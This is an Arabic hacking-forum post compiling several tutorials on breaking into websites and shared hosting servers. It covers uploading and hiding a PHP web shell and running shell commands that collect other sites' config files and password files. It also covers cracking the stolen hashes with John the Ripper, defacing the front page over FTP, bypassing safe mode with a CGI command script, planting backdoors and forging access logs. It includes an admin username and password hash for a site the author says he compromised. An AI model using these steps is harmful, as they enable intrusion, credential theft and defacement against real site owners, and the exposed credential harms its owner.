شبكة الصاعقة العربية الهكرز | تعليم الهكرز | برامج هكرز
   مضى على الشبكة .. 7 سنوات و 222 يوم من العطاء.

ماشاء الله تبارك الله ماشاء الله لاقوة الا بالله اللهم انا نسالك الهدى والتقى والعفاف والغنى
العودة   شبكة الصاعقة العربية الهكرز | تعليم الهكرز | برامج هكرز > >
تسجيل الدخول عبر


نسخ الرابط
الرابط المختصر
في حال وجود أي مواضيع او ردود مُخالفة من قبل الأعضاء ، يرجى الإبلاغ عنها فورا باستخدام أيقونة تقرير عن مشاركة ، و الموجودة أسفل كل مشاركة .

مواضيع ننصحك بزيارتها ( مشابهه )
الموضوع مشاركات آخر مشاركة
اقوى و اسهل برنامج اختراق الشبكات المحلية و الواير ليس بلا منازع + صور 5 2011-12-28 01:36 PM
[سؤال] طريقة اختراق الشبكة المحلية ؟؟؟ 3 2010-11-15 06:40 AM
أقوى موضوع في اختراق المواقع 7 2009-12-08 09:11 AM
أقوى موضوع في اختراق المواقع 2 6 2009-12-06 10:39 PM

 
أدوات الموضوع
قديم 2008-08-16   #1
x X x
Guest
 
الصورة الرمزية x X x

عضويتي :
تسجيلي :
الإقامة :
الهواية :
المواضيع :
مشاركاتي : n/a
المتصفح :
المشغل :

Default أقوى شرح في اختراق المواقع المحمية



شباب والله الشرح جميل والله والله ما تطلع الى مخترق مواقع
بس رجز وأصبر



ارجو الرد ولو بكلمة شكر

الكتاب تم تصميمة وشرحة من قبل اشخاص وهم 3 وأرجو الشكر لي ولهم



اخووووووووووووووووووووووو x X x وووووووووووووووووووووكم

نبدا الشرح :::؟
بسم الله الرحمن الرحيم



سيتضمن الكتاب بعض الدرووس المنقوله من بعض خبراء اختراق المواقع وشرح بعض الادوات المساعده للاختراق





الدرس الاول

طريقه اختراق السيرفر كاملا

للكاتب : دكتور الحب

===========================

طريقة اختراق السيرفرات ..

نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..

وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا

قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--

البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))

وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..

ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..

وللتوضيح اكثر..

نفترض انك اخترقت الموقع www.USA.com وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان www.USA.com/download/phpshell.php

وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ

في الفراغ هذا سوف نضع فيه اوامر اللينكس..

ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..

ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي :alam 2:
لاخفاءه نسوي كذا بالطريقة هذي www.USA.com/phpshell.php wget

وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..

---------------------------------------------
ندخل الى موضوعنا

والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.USA.com/download/phpshell.php

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر اللينكس عليه..

وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---== --شرحالاوامر--==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له

اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..

طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو www.ainvar.net والمنتدى من نوعية phpBB

المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك

نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf

وراح يجينا الباسوردات لكل المواقع..

ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..

وهذه ايضا اوامر مبسطة للافادة : : - -
+++++++++++++++++++++++++++++++++
A
access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..
at : لتنفيذ امر في تاريخ ووقت معين
alarm : لعمل منبه
accept : لقبول اتصال على سوكيت .


B
batch : لتنفيذ امر عندما يحصل على تصريح
buildhash : مدقق املائي


C
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر


D
date : لاظهار التاريخ و الساعة
df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )
diff : لمقارنه ملفين
diff3 : لمقارنه 3 ملفات او اكثر
dircmp : لمقارنه دليلان
du : تقرير عن مساحه القرض المستخدم


E
echo : يستخدم لاظهار سطر نكتب فيه تيكست
text editor : ed ( مثل الورد يعني )
egrep : مثل الامر grep
text editor : ex ( مثل الورد يعني )


F
file : للتقرير عن نوع ملف
find : للبحث عن ملفات
finger : تقرير عن مستخدم


G
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات


H
haltsys : لاغلاق النظام
head : لاظهار اول 10 اسطر من الملف


I
ispell : مدقق املائي


K
** kill : لانهاء عمليه


L
line : لقراءة ملف سطر معين في ملف
ln : لعمل لينك ملف معين
logname : للحصول على اسم الدخول الخاص بك
lpr : ارسال طلب للطباعه
lprint : للطباعه بالطابعه المحليه
lpstat : لتقديم تقرير عن حاله الطباعه
lpq : لتقديم تقرير عن حاله الطباعه
ls : لعرض محتويات مجلد


M
mail : لارسال و استقبال ايميلات
man : للحصول على معلومات عن اي امر
mkdir : لعمل دليل جديد
more : لعرض الملفات


P
passwd : لانشاء كملة سر او تغيره
pr : لطباعه ملف
ps : العمليات عن العمليات التي تم تشغيلها
pstat : لعرض حالة النظام
pwd : لعرض المسار الذي انت فيه الان


R
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )
+++++++++++++++++++++++++++++++++++

جميع الحقوق محفوضه للكاتب دكتور الحب



================================================== =========================

اول درس في اختراق المواقع

للاستاذ الكبير سوبر كريستال

س1: ماهي الادوات التى تتيح لي الاختراق بسهوله ؟
س2: كيف اتعرف على نظام الموقع المراد اختراقه؟
س3: كيف اكتشف ثغرات بالموقع المراد اختراقه؟
س4: كيف اكتسب الثغره في صالحي في الاختراق؟
س5: بعد الحصول على الباسوورد مشفر ماذا افعل؟
س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ؟
س7: كيف استطيع ان ادخل على سيرفر الاستضافة عن طريق الموقع المخترق؟
س8: اذا كان بالسيرفر سيف مود (الوضع الآمن) كيف أتخطاه ؟
===S===U===P==E===R===C===R===Y===S===T===A===L==
اولا هذا ليس كل شئ في الاختراق وانما انا وضعت لكم رؤوس اقلام في مجال الاختراق وعليك انت بنفسك تكملة المشوار و هذه الدروس يحتاج لها كل مبتدئ باختراق المواقع وبعد ذالك يعتمد على نفسه .....

اولا الادوات التى تتيح لنا الاختراق وبمعنى اصح لن تستطيع ان تصبح هاكر وانت تعمل على مايكروزززززفت ويندوز
وانا انصحك قبل قرائتك الموضوع ان تذهب الى أقرب محل كمبيوتر وتشتري اسطوانات لينكس
وافضل انواع نظام اللينكس هو
المرتبة الاولى : المــاندريــك
المرتبة الثانية : الريد هات
المرتبة الثالثة : سوزي Suse
ويوجد عدة انواع ولكن انا بنفسي افضل السوزي ولكنه معقد بعض الشئ للمبتدئين

نظام لينكس يختلف عن الويندوز وشبية بنظام ليندوز
في نظام ويندوز يوجد الدوس bos وهو لتنفيذ الاوامر
وايضاء في نظام لينكس يوجد الشيل shell وهو ايضا لتنفيذ الاوامر مثل السكريبتات وترجمة لغة السي وغيرها.
يطلق على نظام لينكس المصدر المفتوح وهو قطعه مصغره من نظام يونيكس الذي يستخدم للسيرفرات وهو قوي جدا
تاريخ اصدار لينكس هو في عام 1991 وتم اصداره كبرنامج مجاني في عام 1992


ثاني اداة هي برنامج جون ذا ريبر وهذا البرنامج لكسر الباسووردات المشفره
وسوف اشرحه فيما بعد


====S==u==p==E==r===C==r==y==s==t==a===L======
س2: كيف اتعرف على نظام الموقع المراد اختراقه؟

التعرف على نظام الموقع له عدة طرق فمنها
عن طريق التلينت..
التلينت هو نظام يوجد في الويندوز للاتصال بأجهزه بعيده
وطريقه تشغيله
اذهب الى
ابدا Start
تشغيل run
اكتب telnet
بعد ذلك إضغط على connectثم على Remote System بعد ذالك ستظهر لك شاشة صغيره
اكتب اسم الموقع بدون / او http:// بجنب Host Name
Port سوف يظهر لك خمس خيارات من بينها telnet اختارها
Term Type اتركه كما هو
واضغط موافق ==>Enter

انتظر قليلا وسوف يستخرج التلينت لك معلومات عن الموقع مثل نظامه
اذا كان يونيكس او ويندوز 2000 اباتشي او غيره

ماذا نستفيد من هذه المعلومات : الاستفاده هي اننا علمنا ان الموقع شغال على نظام Linux Apache وقد استخدم تصميم الموقع على الفرونت بيج او غيره
ويوجد طريقه ثانيه واسهل
اذهب لموقع نت كرافت www.netcraft.com اكتب عنوان الموقع المراد اختراقه بدون http او / يعنى مثلا اننا نريد اختراق موقع http://www.crystal.com
نكتب www.crystal.com


ونضغط على انتر او Lookup
بعد ذالك سوف يستخرج لك معلومات الموقع
-----------------------
Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.2 PHP/4.3.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.6b on Linux-----------------------
يظهر لنا أن ملقم الويب هو
Apache
النسخة/الإصدارة
1.3.29
مع دعم الفرونت بيج FrontPage
طبعا ثغرات الفرونت بيج كثيره جدا

والثغرات الآمنية هي اخطاء برمجية ومعروف ان شركه مايكروززززفت لاتخلوا من الاخطاء لانها شركه فاشله جدا وكل ادواتها وبرامجها معرضة للاختراق


الآن عرفنا الدعم وهو فرونت بيج

نأتى للخطوة الثانيه

==B==L==A==C==K===3==S===F===H====C==O===M=====
- r E p u S
- C r y s t a l
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=

س3: كيف اكتشف ثغرات بالموقع المراد اختراقه؟
الجواب في الخطوة الاولى تعرفنا على نظام الموقع وعرفنا ان الموقع يدعم الفرونت بيج مثلا
Ok الان اذهب لمواقع السكيورتى
او حمل أي برنامج ماسح لثغرات
مثل : Shadow Security Scanner
وانا اقول لك قبل استخدامك هذه البرنامج لاتعتمد عليه لانه سوف يستخرج لك 100000 ثغره و1 منها تفيدك و99999 لاتهم

طبعا برنامج الشادو سكان لن اشرحه هنا لانى شرحته قبل كذى في منتدى نجم دوس ## قسم الهاكرز العام ##

والان ابحث عن ثغرات الفرونت بيج عن طريق الشادو سكان او أي برنامج ماسح ثغرات او مواقع سكيورتى



%&%&%&%&%&%&%&%&%&%&%&%&%&%&%&%&

س4: كيف اكتسب الثغره في صالحي في الاختراق؟

الان اكتشفنا ثغره بالموقع
ولكن لن تفيدك اذا اضفتها للموقع هكذا ولكن يجب عليك ان تفعل مايجب فعله :
وهو ان تكون الاكسبلويت تنفيذي والحل هنا انك تنسخ الثغره وتضعها في الشيل
وسوف تكون تنفيذيه والان اكتب بعد عنوان الموقع واضافه الثغره /passwd.txt
وسوف يظهر لك اليوزرنيم والباسوود تبع الموقع مشفر هكذا xOi4i8U
وهذا موقع مخترقه انا
واعتبره فأر تجارب
http://amherstxc.aminfo.com/
وهذا اليوزرنيم والباسوورد حق الموقع
WebAdmin:aepTOqxOi4i8U


الان ماذا تفعل حتى تكسر اليوزرنيم والباسوورد وتدخل على الموقع
=-=--S=-=-u=-=-p=-=-E=-=-r=-=-C=-=-r=-=-y=-=-s=-=-T=-=-a=-=L=-

الان استخدم اداة جون ذا ريبر في كسر الباسوورد
واذا كان لايتوفر لديك هذا البرنامج
اذهب الى محرك البحث GOOGLE
واكتبjohn-16 zip
بعد تحميل اداة جون وتثبيتها ونقلها لقرص السي
اذهب الى مجلد john-16 سوف يظهر لديك مجلدين واحد بأسمrun والثاني باسم doc
يهمنا هنا مجلد run ادخل عليه وضع الباسوورد واليوزرنيم المشفر
WebAdmin:aepTOqxOi4i8U
في المفكره واحفظها باسم passwd.txt او أي اسم وضعها في مجلد run

الآن اذهب الى
ابدا start
تشغيل run
اكتب command
سوف تظهر لديك شاشة الدوس
الان اكتب
cd john
واذا ظهر لديك في شاشة الدوس
<c:\john
اكتب
cd RUN

والان اكتب
john -i:all passwd.txt
واضغط انتر
اسم المجلد الذي وضعت فيه الباسوورد =passwd

وهذه بعض اوامر اداة جون في كسر التشفير
john -i:all passwd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات

====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة

====
john -i: Digits passwd.txt
----------------------------------
يبحث عن الأرقام

====
john -single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
ويوجد اوامر اخرى
john -si passwd.txt
john -w:word.txt passwd.txt

وهذا وورد لست لتسهيل عمليه كسر الباسوورد
ftp://ftp.ox.ac.uk/pub/wordlists
ضع الوورد لست في ملف run الموجود في ملف john الخاص بالاداة
والان استخدم هذا الامر عند فك التشفير
john -w:CrystaL.txt passwd.txt
ملاحظه:
CrystaL.txt: استبدله باسم الوورد لست و passwd.txt استبدلها باسم الملف الذي وضعت به الباسوورد

والان ابدا بعملية الكسر


/\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\/\/\\//\\//\\//\\///\\//\\//\\//\\
==S==u===p==E==r===C==r==y==s==T==a==L========
/\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\/\/\\//\\//\\//\\///\\//\\//\\//\\
س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ؟
الجواب سهل جدا
اذهب الى ابدا وبعد ذالك تشغيل واكتب Command
وبعد دخولك لشاشة الدوس اكتب ftp
وبعد ذالك اكتب www.CrystaL.com
CrystaL= اسم الموقع المخترق
سوف يطلب منك كلمة المرور واسم المستخدم
وانت الان كسرت اليوزرنيم والباسوورد باداة جون يعنى انك حصلت على كلمة المرور واسم المستخدم الخاصه بالموقع والتى لاتوجد الا مع المدير Admin
وهذه هي اوامر الفتب

Is= عرض الملفات الموجوده
Get = لتحميل ملف وطريقته هكذا فرضنا ان الملف موجود بالسيرفر باسم Super لتحميل الملف اكتب هذا الامرGet Super
Sacii= لنقل ملفات الـhtml والتكست
Put = لنقل الملفات من جهاز ك لسيرفر
والطريقه هكذا فرضنا ان الملف الموجود في جهازك يحمل هذا الاسم crystal الطريقه لنقله للسيرفر هكذا
Crystal Put

نكتب اسم الملف ويليه الامر هذا put

واذا كنت من عشاق الشهره وتريد تغيير الصفحة الرئيسية الخاصه بالموقع
احفظ شعارك باسم index.html في قرص السي وانقلها للموقع عن طريق الاف تي بي

===S===U===P==E===R===C===R===Y===S===T===A===L==

س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ؟

ج6: الجواب سهل جدا الان انقل اداة الشيل اكوينت shell الى الموقع المخترق
يعنى ارفع الاداة للموقع
وبعد ذالك ادخل على صفحة الشيل التى رفعتها على الموقع المخترق ونفذ الاوامر
والسكربتات ...... ولكن !
اذا كان سيرفر الاستضافة الذي يوجد عليه الموقع المخترق محمي
ونقول بكلمة سيف مود (الوضع الآمن) وهو حجب او منع سكربتات
الــshell_exe و sytemو php وغيره
بمعنى اصح انك لاتستطيع ان تنفذ اوامر الشيل على السيرفر
لكن تخطي السيف مود وتنفيذ الاوامر
استخدام سكربتات بيرل و سي جي آي
وسأطرح هنا احد السكربتات الخبيثه
مثل سكريبت Cgicommand
ولتحميله
http://corruptcode.org/downloads/cgicommand.zip


بعد تحميله يجب تحديد المسار الافتراضي للبيرل حتى يعمل بشكل افضل :
usr/local/bin/perl
والان اذا كان نوع السيرفر المراد اختراقه ويندوز 2000
$WinNT = 0;
استبدل هذا
بــ$WinNT = 1;
اما اذا كان نوع السيرفر يونيكس فأتركه كما هو
والان نضع كلمة مرور على السكريبت
Password = " changeme";
Changeme= كلمة المرور وهذه
والان اتصل بالشيل عن طريق منفذ 22


==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
وهذه بعض اوامر الشيل هذا الامر يظهر لك المواقع واليوزنيم
cat /etc/domainalias
cat /etc/passwd
=====
وهذا الامر لعرض باسووردات المستخدمين على السيرفر
cat /home/*/public_html/_vti_pvt/service.pwd
وهذا الامر لمعرفه الباسوورد لقاعده البيانات
find / -name config.php
وهذا الامر لعرض المواقع التى على نفس السيرفر
ls /var/named
============

================================================== =========





الدرس الثاني لاختراق المواقع

للكاتب :سوبر كريستال

الدرس الثاني من اختراق المواقع(لم يشرحه اي هاكرز)


### بسم الله الرحمن الرحيم####
طبعا في درسنا السابق والذي يحمل عنوان(((اول باب لك في اختراق المواقع))
قد شرحنا هذه النقاط

س1: ماهي الادوات التى تتيح لي الاختراق بسهوله ?
س2: كيف اتعرف على نظام الموقع المراد اختراقه؟
س3: كيف اكتشف ثغرات بالموقع المراد اختراقه؟
س4: كيف اكتسب الثغره في صالحي في الاختراق؟
س5: بعد الحصول على الباسوورد مشفر ماذا افعل؟
س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ?
س7: كيف استطيع ان ادخل على سيرفر الاستضافة عن طريق الموقع المخترق؟
س8: اذا كان بالسيرفر سيف مود (الوضع الآمن) كيف أتخطاه ?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&
اما في درسنا هذا فسوف نشرح هذه النقاط:-
^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&
SupEr-CrystaL=-=-=-=-=-=-==-=-=-=-=-=-=
[][][][][][][][CRYSTAL6.COM][][][][][][][]
[][][][][][][][CRYSTAL6.NET][][][][][][][]
77777777777777777777777777777777777
88888888888888888888888888888888888
س1:ماهو الاكسبلويت(Exploits) ?
س2: ماهو الباك دور (BackdooR) وماهي انواعة ?
س3: ماهو السنايفر(sNifer)?
س4: اللوج وتخطيه او مسحه؟
س5: ماهو السكريبت كيدز؟
س6: كيف يمكنني إختراق جميع المواقع التى علي السيرفرمرة وحدة! ؟؟

----------------^---^---^--------^---^---^----------------------
---------------~~~~~~~~~~~~~~~~~~-----------------------
ماهو الاكسبلويت(Exploits) ?
اولا الاكسبلويت هي ثغرات تنفيذيه تستطيع ان تستعرض ملفات المواقع من خلالها عن طريق المتصفح
انواع الاكسبلويتات
1- PHP Exploits
2- DOS Exploits
3- Buffer Over Flow Exploits
4- CGI Exploits
طبعا كل نوع من الاكسبلويت له طريقة عمله
بأمكانك الدخول على السيرفر عن طريق هذا الاكسبلويتات وبأمكانك التحكم بالروت حتى ولو لم تكن لديك صلاحية في ذالك !!!!!
طبعا قبل ان تبدأ في مجال الاكسبلويت يجب ان يكون لديك خلفية في لغة السي حتى تتم من ترجمتها والتعديل فيها
)()()()()()()()()()()()()()()()()()()()()()()()()(
)()()()()()()()()()()()()()()()(

س2: ماهو الباك دور (BackdooR) وماهي انواعة ?
الباك دور هو اداة تعيدك لسيرفر مع حفظ ادواتك التى استخدمتها على السيرفر
مثلا يااخوان انى كنت محمل شيل على موقع مخترق وكل يوم ارفع ملفاتى على السيرفر عن طريق الموقع المخترق
مع الوقت كشفنى صاحب السيرفر وغير الباسوورد ماذا افعل؟ مع الباك دور بأمكانك تفعل مايجب فعله
وهو انك تدخل على السيرفر حتى ولو ان الادمن غير الباسوورد بأمكانك تدخل كامستخدم روت لاتستعجل سوف تعرف كل شئ بإذن الله
وماهي انواع الباك دور ؟؟؟؟؟؟؟
هو: passive
و : Active
==-=-=-
telnetd
4- Kernel
5- Services
طبعا سوف نشرح كل نوع بالتفصيل ان شاء الله
النوع الاول هو رهيب وممتاز في نفس الوقت وأتماتيك يعنى يشتغل دايركت
النوع الثاني: سهل جدا وكثير مايستخدمه اخوانا الهاكرز في الاختراق لانه سهل جدا ويكون شغال طول الوقت وهذا هو اختلافه عن الاول
=========================================
لنفرض اننا اخترقنا السيرفر ولكن ليس بصلاحية روت يعنى كامستخدم عادي الافضل هنا اننا نستخدم هذا النوع من الباك دور passive لماذا ! ? الجواب انني شرحت انه أتماتيك يعنى يشتغل لوحدة وهذي الطريقة حلوه بما انك لست روت على السيرفر فقط استخدم هذا النوع وهو بنفسه بعد مايتم دخول الروت سوف يتم تفعيله
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^
Telnetd بأمكانك عن طريق هذا النوع من انواع الباك دور آخذ اكسس على السيرفر


وعلى مااظن ان هذه الطريقة هي التي فعلها اخونا (مارافول) في موقع نجم على حسب كلامه انه يقول آخذت اكسس على السيرفر ويقول هذي الطريقة لايعرفها احد !!! لووووووول : وهاانا اوضحها لكم هنا
نأتى في النوع الرابع وهو الكيرنلKerneL
هذا النوع واضح من اسمة وتستطيع عن طريق هذا النوع من الباك دور الدخول الى الكيرنل وتجعله يعمل في صالحك
نأتى لنوع الخامس من الباك دور وهو خدمة باك دور Services وهذا النوع بأمكانك ان تضيف خدمات لسيرفر مثل خدمة الاف تي بي اذا كان لايدعمها وغيرها وهذي الطريقه رهيبه وتعمل في صالحك
()()()()()()()()()()()()()()()()()()()()()()()()()
()()()()()()()()()()()()()()()((((
CrystaL6.CoM Super-CrystaL
()()()()()()()()()()()()()()()()()()()()()()()()()
()()()()()()()()()()()()()()()((((
س3: ماهو السنايفر(sNifer)?
الجواب هي ادوات تجسس وهي مصممة لمراقبة الباكيت الصادرة والوارته نكتفي بهذا الإجابه
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
يوجد نقطه يااخوان اضطر اني اوضحها لكم وهي((logs)) ؟؟
معناه يااخوان هو مجلد يضع فيه رقم الاي بي وهذا آخطر شئ في الإختراق من الممكن ان يكون واحد غبي يخترق موقع شركه مثلا او أي موقع ويجلس يمسح وينزل ولاينتبه لملف اللوج وعلى كذا ?ينصاد
اولا ملف اللوج ينقسم الى قسمين عندك الــerror والـــaccess وملف اللوج يأتى مع السيرفر جاهز
يعنى لاتفكر ان فيه سيرفرات مافيها ملفات لوج ((logs))
-----------------------------------
[Thu May 06 16:54:52 2004] [error] [client 127.0.0.1] File does not
exist: http://www.xxxx.com/admin/image/logo.gif
[Thu May 06 16:54:52 2004] [error] [client 127.0.0.1] File does not
-----------------------------------------------
اكيد فهمتوا الآن مدى خطورة ملفات اللوج ((يعنى يستخرج عنك معلومات كامله وحتى بالتاريخ ))
الطريقة الافضل لتخطى ملفات اللوج ............. هو انك تغير رقم الاي بي في مجلد error وتضع رقم أي بي وهمي وليكون الــ127.0.0.1 ولكن انتبه لاتحذف الملف حتى لايشك المدير واحب اوضح شئ ثاني
بما انك مسحت ملفات اللوج تعتبر انك مسحت آثرك ..................لا
لان حتى لو تحذف ملف اللوج وترجع لصفحة الموقع المخترق او السيرفر بيرجع يوضع نفسه من جديد ملف اللوج وبرقم جهازك ولكن انتبه لاتحذف ملف اللوج الا بعد ماتنهى كل شئ يعنى ماناقص الا تمسح ملف اللوج وتطلع من الموقع ............
مجلد الــaccess
-----------------------------------
//phpmyadmin/user_details.php HTTP/1.1" 200 4069
127.0.0.1 - - [07/May/2004:16:35:45 +0300] "GET /phpmyadmin/libraries/user_details.js HTTP/1.1" 304 -
127.0.0.1 - - [07/May/2004:16:36:45 +0300] "GET /test/ HTTP/1.1" 200 1043
127.0.0.1 - - [07/May/2004:16:37:20 +0300] "GET /test/ HTTP/1.1" 200 1043
127.0.0.1 - - [07/May/2004:16:38:44 +0300] "GET /test/ HTTP/1.1" 200 /user_details.php HTTP/1.1" 200 4069
127.0.0.1 - - [07/May/2004:16:35:45 +0300] "GET /phpmyadmin/libraries/user_details.js HTTP/1.1" 304 -
127.0.0.1 - - [07/May/2004:16:36:45 +0300] "GET /test/ HTTP/1.1" 200 1043
127.0.0.1 - - [07/May/2004:16:37:20 +0300] "GET /test/ HTTP/1.1" 200 1043
127.0.0.1 - - [07/May/2004:16:38:44 +0300] "GET /test/ HTTP/1.1" 200
-------------------------------------
يكون هكذا يجب مسح الملفين ملف الــerror والـــaccess

هو شبيه بحد أكبر لملف الــerrors الى بالمنتديات بلوحة التحكم في المنتدى ياطويل العمر تحصل بمجلد vb ملف بأسم errors افتحه راح تحصل في داخله
=====
[10-May-2004 01:19:32] PHP Warning: Can't connect to MySQL server on 'localhost' (10061) in http://www.xxxxx.com\vb\index.php on line 48
---------------------------------
الى هو تاريخ دخولك للمنتدى وحتى لو تحذفه وترجع لصفحة الرئيسيه تبع المنتدى بيرجع وينزل نفسه من جديد وبنفس المعلومات الى فوق لكن يختلف عن ملف اللوج الى بالسيرفر انه مايضع رقم الاي بي تبعك
فهمت الحين إن شاء الله يكون شرحي واضح

س4: ماهو السكريبت كيدز؟
الجواب هو قبل قرائتك الجزء اللي فوق يعنى يريدون ان يخترقوا فقط بدل مايتعامل مع الإختراق بالشكل الافضل
وهو الشخص الذي يكتفى بوضعه شعار ((تم اختراق الموقع)) على السيرفر وخلاص
وانا اعتبر الاخوان الى الآن يخترقوا بثغرات في محركات البحث ويضعوا اسمائهم وتم اختراق الموقع وصلح ازعاج وزحمه اعتبرهم سكريبت كيدز ---------- امثال ((اللى مايتسماش وخد بالك))
<< ----- انا وضحت هذا حتى يصحوا من النوم ويشوفوا طريقه افضل من انهم يخترقوا بثغرات تعبانه وكل واحد يقول انا الى مكتشف الثغره ..... ليت الثغره تستاهل علشان تتفاخر بأكتشافها

المهم نرجع لمحور حديثنا ....
<><><><><><><><><><><><><><><><><><><><><><><><> <> <
س5: كيف يمكنني إختراق جميع المواقع التى علي السيرفر مرة وحدة! ؟؟
الكثير يااخوان بيقول الحين ليش تضع طريقة السكريبت كيدز وانت قبل شوي تسب في الى يشهر بنفسه

وراح اوضح لكم ياشباب انا والله الى اشوفه حتى لو انه مبتدئ بس يحاول انه يتعلم فهذا يعجبني صراحه
